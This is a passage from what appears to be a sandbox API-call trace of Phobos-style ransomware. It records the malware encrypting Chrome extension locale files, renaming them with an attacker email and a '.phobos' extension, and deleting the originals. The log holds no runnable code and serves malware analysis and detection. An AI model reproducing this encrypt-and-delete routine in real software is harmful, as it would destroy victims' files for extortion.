dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.223] CryptDestroyKey (hKey=0xa32968) returned 1 [0165.223] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.223] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.223] CloseHandle (hObject=0x138) returned 1 [0165.223] CloseHandle (hObject=0x194) returned 1 [0165.223] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json")) returned 1 [0165.392] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.392] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=21907) returned 1 [0165.392] CloseHandle (hObject=0x194) returned 1 [0165.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json")) returned 0x2020 [0165.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.393] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.393] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.393] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.393] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5593, lpOverlapped=0x0) returned 1 [0165.540] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x55a0, dwBufLen=0x55a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x55a0) returned 1 [0165.540] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x55a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x55a0, lpOverlapped=0x0) returned 1 [0165.541] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0165.541] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.541] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.541] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.541] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.541] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.541] CloseHandle (hObject=0x194) returned 1 [0165.541] CloseHandle (hObject=0x138) returned 1 [0165.541] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json")) returned 1 [0165.542] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.543] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=20324) returned 1 [0165.543] CloseHandle (hObject=0x138) returned 1 [0165.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json")) returned 0x2020 [0165.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.543] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.543] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.544] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.544] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.544] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4f64, lpOverlapped=0x0) returned 1 [0165.569] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4f70, dwBufLen=0x4f70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4f70) returned 1 [0165.569] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4f70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4f70, lpOverlapped=0x0) returned 1 [0165.570] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0165.571] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.571] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.571] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0165.571] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.571] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.571] CloseHandle (hObject=0x138) returned 1 [0165.571] CloseHandle (hObject=0x194) returned 1 [0165.571] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json")) returned 1 [0165.572] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.572] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=18673) returned 1 [0165.572] CloseHandle (hObject=0x194) returned 1 [0165.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json")) returned 0x2020 [0165.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.573] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.573] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.573] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.573] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x48f1, lpOverlapped=0x0) returned 1 [0165.604] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4900, dwBufLen=0x4900 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4900) returned 1 [0165.604] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4900, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4900, lpOverlapped=0x0) returned 1 [0165.605] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0165.605] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.605] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.605] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0165.605] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.606] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.606] CloseHandle (hObject=0x194) returned 1 [0165.606] CloseHandle (hObject=0x138) returned 1 [0165.606] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json")) returned 1 [0165.607] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.607] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=15633) returned 1 [0165.607] CloseHandle (hObject=0x138) returned 1 [0165.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json")) returned 0x2020 [0165.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.608] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.608] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.608] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.608] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.608] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3d11, lpOverlapped=0x0) returned 1 [0165.610] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3d20, dwBufLen=0x3d20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3d20) returned 1 [0165.610] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3d20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3d20, lpOverlapped=0x0) returned 1 [0165.611] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0165.611] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.611] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.611] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0165.611] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.611] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.611] CloseHandle (hObject=0x138) returned 1 [0165.611] CloseHandle (hObject=0x194) returned 1 [0165.611] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json")) returned 1 [0165.612] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 